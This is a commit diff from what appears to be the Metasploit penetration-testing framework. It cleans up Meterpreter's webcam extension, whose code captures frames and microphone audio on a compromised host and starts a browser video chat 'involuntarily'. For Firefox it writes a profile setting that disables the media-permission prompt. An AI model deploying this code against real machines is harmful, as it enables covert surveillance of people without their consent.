Land rapid7#5262, fix webcam_chat and tidy adjacent code

hdm · Aug 31, 2015 · 30830ad · 30830ad
2 parents acc24df + a51d3df
commit 30830ad
Show file tree

Hide file tree

Showing 4 changed files with 155 additions and 161 deletions.
diff --git a/data/webcam/offerer.html b/data/webcam/offerer.html
@@ -169,7 +169,7 @@
 					userid: 'self',
 					stream: stream
 				});
-						
+
 				callback(stream);
 			});
 		}
@@ -178,7 +178,7 @@
 <body>
 
 <div class="windowa" id="windowa">
-	<b>You peer</b>
+	<b>Your peer</b>
 </div>
 
 <div class="dot1"></div>
@@ -199,4 +199,4 @@
 </div>
 
 </body>
-</html>
+</html>
diff --git a/lib/rex/compat.rb b/lib/rex/compat.rb
@@ -166,9 +166,9 @@ def self.open_webrtc_browser(url='http://google.com/')
       app_data = ENV['APPDATA']
       paths << "#{app_data}\\Google\\Chrome\\Application\\chrome.exe"
 
-      paths.each do |p|
-        if File.exists?(p)
-          args = (p =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
+      paths.each do |path|
+        if File.exists?(path)
+          args = (path =~ /chrome\.exe/) ? "--allow-file-access-from-files" : ""
           system("#{path} #{args} #{url}")
           found_browser = true
           break
@@ -188,13 +188,14 @@ def self.open_webrtc_browser(url='http://google.com/')
     end
   else
     if defined? ENV['PATH']
-      ['chrome', 'chromium', 'firefox', 'opera'].each do |browser|
+      ['firefox', 'google-chrome', 'chrome', 'chromium', 'firefox', 'opera'].each do |browser|
         ENV['PATH'].split(':').each do |path|
           browser_path = "#{path}/#{browser}"
           if File.exists?(browser_path)
             args = (browser_path =~ /Chrome/) ? "--allow-file-access-from-files" : ""
             system("#{browser_path} #{args} #{url} &")
             found_browser = true
+            break
           end
         end
       end

diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb
@@ -1,7 +1,5 @@
 # -*- coding: binary -*-
 
-#require 'rex/post/meterpreter/extensions/process'
-
 module Rex
 module Post
 module Meterpreter
@@ -15,7 +13,6 @@ module Webcam
 #
 ###
 class Webcam
-
   include Msf::Post::Common
   include Msf::Post::File
   include Msf::Post::WebRTC
@@ -31,9 +28,9 @@ def session
   def webcam_list
     response = client.send_request(Packet.create_request('webcam_list'))
     names = []
-    response.get_tlvs( TLV_TYPE_WEBCAM_NAME ).each{ |tlv|
+    response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv|
       names << tlv.value
-    }
+    end
     names
   end
 
@@ -49,11 +46,11 @@ def webcam_get_frame(quality)
     request = Packet.create_request('webcam_get_frame')
     request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality)
     response = client.send_request(request)
-    response.get_tlv( TLV_TYPE_WEBCAM_IMAGE ).value
+    response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value
   end
 
   def webcam_stop
-    client.send_request( Packet.create_request( 'webcam_stop' )  )
+    client.send_request(Packet.create_request('webcam_stop'))
     true
   end
 
@@ -67,13 +64,13 @@ def webcam_chat(server)
     offerer_id = Rex::Text.rand_text_alphanumeric(10)
     channel    = Rex::Text.rand_text_alphanumeric(20)
 
-    remote_browser_path = get_webrtc_browser_path
+    remote_browser_path = webrtc_browser_path
 
     if remote_browser_path.blank?
-      raise RuntimeError, "Unable to find a suitable browser on the target machine"
+      fail "Unable to find a suitable browser on the target machine"
     end
 
-    ready_status = init_video_chat(remote_browser_path, server, channel, offerer_id)
+    init_video_chat(remote_browser_path, server, channel, offerer_id)
     connect_video_chat(server, channel, offerer_id)
   end
 
@@ -83,48 +80,47 @@ def record_mic(duration)
     request = Packet.create_request('webcam_audio_record')
     request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration)
     response = client.send_request(request)
-    response.get_tlv( TLV_TYPE_AUDIO_DATA ).value
+    response.get_tlv(TLV_TYPE_AUDIO_DATA).value
   end
 
   attr_accessor :client
 
-
   private
 
-
   #
   # Returns a browser path that supports WebRTC
   #
   # @return [String]
   #
-  def get_webrtc_browser_path
+  def webrtc_browser_path
     found_browser_path = ''
 
     case client.platform
     when /win/
       paths = [
-        "Program Files\\Google\\Chrome\\Application\\chrome.exe",
-        "Program Files\\Mozilla Firefox\\firefox.exe"
+        "%ProgramFiles(x86)%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramFiles%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramW6432%\\Google\\Chrome\\Application\\chrome.exe",
+        "%ProgramFiles(x86)%\\Mozilla Firefox\\firefox.exe",
+        "%ProgramFiles%\\Mozilla Firefox\\firefox.exe",
+        "%ProgramW6432%\\Mozilla Firefox\\firefox.exe"
       ]
 
-      drive = session.sys.config.getenv("SYSTEMDRIVE")
-      paths = paths.map { |p| "#{drive}\\#{p}" }
-
       # Old chrome path
       user_profile = client.sys.config.getenv("USERPROFILE")
       paths << "#{user_profile}\\Local Settings\\Application Data\\Google\\Chrome\\Application\\chrome.exe"
 
       paths.each do |browser_path|
         if file?(browser_path)
-          found_browser_path = browser_path
+          found_browser_path = client.fs.file.expand_path(browser_path)
           break
         end
       end
 
     when /osx|bsd/
       [
         '/Applications/Google Chrome.app',
-        '/Applications/Firefox.app',
+        '/Applications/Firefox.app'
       ].each do |browser_path|
         if file?(browser_path)
           found_browser_path = browser_path
@@ -140,7 +136,6 @@ def get_webrtc_browser_path
     found_browser_path
   end
 
-
   #
   # Creates a video chat session as an offerer... involuntarily :-p
   # Windows targets only.
@@ -161,9 +156,9 @@ def init_video_chat(remote_browser_path, server, channel, offerer_id)
     begin
       write_file("#{tmp_dir}\\interface.html", interface)
       write_file("#{tmp_dir}\\api.js", api)
-    rescue ::Exception => e
-      elog("webcam_chat failed. #{e.class} #{e.to_s}")
-      raise RuntimeError, "Unable to initialize the interface on the target machine"
+    rescue RuntimeError => e
+      elog("webcam_chat failed. #{e.class} #{e}")
+      raise "Unable to initialize the interface on the target machine"
     end
 
     #
@@ -176,26 +171,29 @@ def init_video_chat(remote_browser_path, server, channel, offerer_id)
       profile_name = Rex::Text.rand_text_alpha(8)
       o = cmd_exec("#{remote_browser_path} --CreateProfile #{profile_name} #{tmp_dir}\\#{profile_name}")
       profile_path = (o.scan(/created profile '.+' at '(.+)'/).flatten[0] || '').strip
-      setting = %Q|user_pref("media.navigator.permission.disabled", true);|
+      setting = %|user_pref("media.navigator.permission.disabled", true);|
       begin
         write_file(profile_path, setting)
-      rescue ::Exception => e
-        elog("webcam_chat failed: #{e.class} #{e.to_s}")
-        raise RuntimeError, "Unable to write the necessary setting for Firefox."
+      rescue RuntimeError => e
+        elog("webcam_chat failed: #{e.class} #{e}")
+        raise "Unable to write the necessary setting for Firefox."
       end
       args = "-p #{profile_name}"
     end
 
-    exec_opts = {'Hidden' => false, 'Channelized' => false}
+    exec_opts = { 'Hidden' => false, 'Channelized' => false }
 
     begin
       session.sys.process.execute(remote_browser_path, "#{args} #{tmp_dir}\\interface.html", exec_opts)
-    rescue ::Exception => e
-      elog("webcam_chat failed. #{e.class} #{e.to_s}")
-      raise RuntimeError, "Unable to start the remote browser: #{e.message}"
+    rescue RuntimeError => e
+      elog("webcam_chat failed. #{e.class} #{e}")
+      raise "Unable to start the remote browser: #{e.message}"
     end
   end
-
 end
-
-end; end; end; end; end; end
+end
+end
+end
+end
+end
+end